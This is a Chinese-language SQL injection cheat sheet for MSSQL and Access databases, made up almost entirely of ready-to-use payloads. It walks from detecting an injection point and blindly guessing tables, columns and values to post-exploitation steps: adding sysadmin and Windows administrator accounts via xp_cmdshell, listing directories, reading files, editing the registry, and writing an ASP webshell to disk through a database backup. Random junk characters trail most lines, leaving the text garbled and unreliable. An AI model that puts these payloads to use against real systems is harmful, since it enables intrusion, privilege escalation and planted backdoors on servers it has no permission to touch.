1.判断是否有注入;and 1=1 ;and 1=2 @ym/27cRE
2.初步判断是否是mssql ;and user>0 p{PE@KO:
)xb|3&+W
3.注入参数是字符'and [查询条件] and ''=' Q}S_%I}u:
a_h]?5
:c
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ""s]zNF}
Y?ez9o:/#
5.判断数据库系统 PMfkA!.Y
Cgz D$`~
;and (select count(*) from sysobjects)>0 mssql Q5%#^ZdsTd
CRbdAqofV
;and (select count(*) from msysobjects)>0 access 0flg=U9
gKOOHUCb
&Q}*+Y]G
lo'W1p
6.猜数据库 ;and (select Count(*) from [数据库名])>0 rp5(pV7*
*6 _tQ9G
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ORu2V#Z[
tDr#H!2
3
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 [!%![E
p$ bnK]
9.(1)猜字段的ascii值(access) lY*[tmz)
5s{ABJ\@V
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 iMfngIs |
!?^b[
nC%
(2)猜字段的ascii值(mssql) !~Q2|r
au,t%8AC
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Agrp(i"\@
@y31NH(
10.测试权限结构(mssql) Tr^nkD{
QMEcQV>
J<Pw+6B~
z"*/mP2
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- r!,}Z=cGe
h[Gg}N!
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- nNXgW
N25V]
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- c^`]`xiX
m[k_>e\u
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 0zY(:;X
U\rh[0
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- #lU9yv
1,5E`J
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ["}rk
JF/,K"J
;and 1=(select IS_MEMBER('db_owner'));-- ![f ![l
J~(Wf%jM~
H~ u[3LQz
mw5?[@G-
11.添加mssql和系统的帐户 ^*\XgX
/pp1~r.s?>
;exec master.dbo.sp_addlogin username;-- ~ H6r.:]
;exec master.dbo.sp_password null,username,password;-- UJs$q\#RO
U.{l;EL:T
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- <LRey%{q
4`Ic&c/
;exec master.dbo.xp_cmdshell 'net user username password Mc!Xf[
@*
il3h,
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- FYS/##r
0kDK~iT
;exec master.dbo.xp_cmdshell 'net user username password /add';-- moVbw`T
DQwGUF'(
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 5Zw1y@k(
L,;D@Xi
H:H6b
-)vEWn$3<
12.(1)遍历目录 NzKUtwnIz
|j3'eW&=
;create table dirs(paths varchar(100), id int) Vb
qto|X@
,7XtH>2s
;insert dirs exec master.dbo.xp_dirtree 'c:\' 'Peni1_
(Z5##dS3
;and (select top 1 paths from dirs)>0 M/Pme&%
#.[AK_S5&
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 5PcJZi^.l
~XeFOMq
<}6{{&mT4
RllY-JBO
(2)遍历目录 1009ES7*
7*DMVok:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- n}xhW'3hU=
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 S(aZ4{a@
PCn Q_A-Q
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 p$7#}s
d3^OEwe
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 1{_A:<VBl
/J)l /oI
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 !se0F.K
VDB;%U*D
^w~23g.
BK,sc'b
13.mssql中的存储过程 S]sk7
r3rxC&
xp_regenumvalues 注册表根键, 子键 NrDi
x{}z ;yG
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 (wmBjQ]B<
>MJ?g-
xp_regread 根键,子键,键值名 \n0Oez0z!B
G1 o70
;exec xp_regread *]J dHO
hl&-\ dc+
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 AGA`fRVx
)x#5Il
H
xp_regwrite 根键,子键, 值名, 值类型, 值 ECa$vvK
m
a'\By?V]
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 nxQ?bk}*d
#sKWd
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 1r r@
"x'),
xp_regdeletevalue 根键,子键,值名 +&KQ28r
S~$'WA
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 HEqWoV]{d
PZ8U6K'
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 7:=5"ScV
k&hc m
\F, DA"K_
!\[+99F#
14.mssql的backup创建webshell O gmO&cE
~fz[x 9\
use model RANPi\]
U3vEdw<lV
create table cmd(str image); q&'Lbxc>c
(B>Zaro#
insert into cmd(str) values (''); E&
36H
o?Sla_D
backup database model to disk='c:\l.asp'; TY;U2.Ud
D 7shiv|,
/7$mxtB5%L
V9x8R
15.mssql内置函数 2^exL h
|c-LSs'\
;and (select @@version)>0 获得Windows的版本号 *.y' (tj[
IN^9uL]B
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
yeD_j/
_J?SIm
;and (select user_name())>0 爆当前系统的连接用户 71B3a
yt.c5>B^
;and (select db_name())>0 得到当前连接的数据库 e/e0d<(1
X=qS"O 1
^[h2% c$
VlW9UF-W
16.简洁的webshell ]>:^d%n,}
Z$K+
7>^
use model `rWB`q|i<
!"4w&bQ
create table cmd(str image); ` DCU>bt&R
GCE!$W
insert into cmd(str) values (''); AfWl6a?T8:
_^uc 0=
backup database model to disk='g:\wwwtest\l.asp';